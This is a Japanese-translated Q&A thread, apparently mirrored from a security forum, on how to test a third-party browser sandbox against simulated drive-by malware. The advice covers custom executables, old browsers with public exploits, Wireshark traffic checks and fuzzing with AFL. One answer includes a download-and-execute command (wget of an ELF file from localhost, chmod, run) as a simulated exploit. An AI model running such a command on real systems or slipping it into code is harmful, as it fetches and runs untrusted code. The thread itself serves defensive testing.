web-dev-qa-db-ja.com

強化されたWebブラウザのセキュリティをテストする方法は?

ブラウザを強化すると主張するサードパーティのセキュリティツールを実装した後、サンドボックス化され強化されたWebブラウザのセキュリティを実際にテストしたいと思います。

それでは、Webブラウザのセキュリティをテストするためにどのように、またはどのようなアプローチをとればよいでしょうか。

編集:具体的には、インストールしたサードパーティツールのサンドボックス機能をテストするを使用します。マルウェアがPC全体に広がることを本当に禁止しているのでしょうか?マルウェアの攻撃ベクトルは、(シミュレートされた)感染したWebサイトからのドライブバイダウンロードです。

web-browserpenetration-testkali-linuxsandboxautomated-testing
1
user3200534

サンドボックス機能をテストする場合は、攻撃者が行うことを試みる実際のエクスプロイトのようなものが必要です。しかし、現在のブラウザでエクスプロイトを取得することは実際には不可能だと思います。したがって、次のオプションがあります。

  1. サンドボックス技術を使用してペイロードを実行しようとする実行可能ファイルを作成して、カスタム実行可能ファイルでサンドボックスをテストします。ブラウザがサンドボックス技術を単独で使用しない場合、結果は同等である可能性があります。
  2. 古いバージョンのブラウザーと公開されているエクスプロイトを使用してサンドボックスをテストします。
  3. system("wget http://127.0.0.1/t.elf; chmod +x ./elf; ./elf");のようなブラウザーにカスタムコードを導入することにより、エクスプロイトの試みをシミュレートしますだろう。
2
40F4

これは、実行しようとしているテストの種類によって異なります。行った強化がブラウザによる情報の不適切な漏洩を防ぐように設計されている場合は、実行中のマシンにWiresharkなどを設定して、ブラウザから送信されたトラフィックを確認できます。

ブラウザが悪用可能な方法でクラッシュする可能性があるかどうかをテストする場合、それは別の問題です。それは複雑なプロセスのようなものですが、 American Fuzz Lop のようなものが出発点になる可能性があります。

0
Rory McCune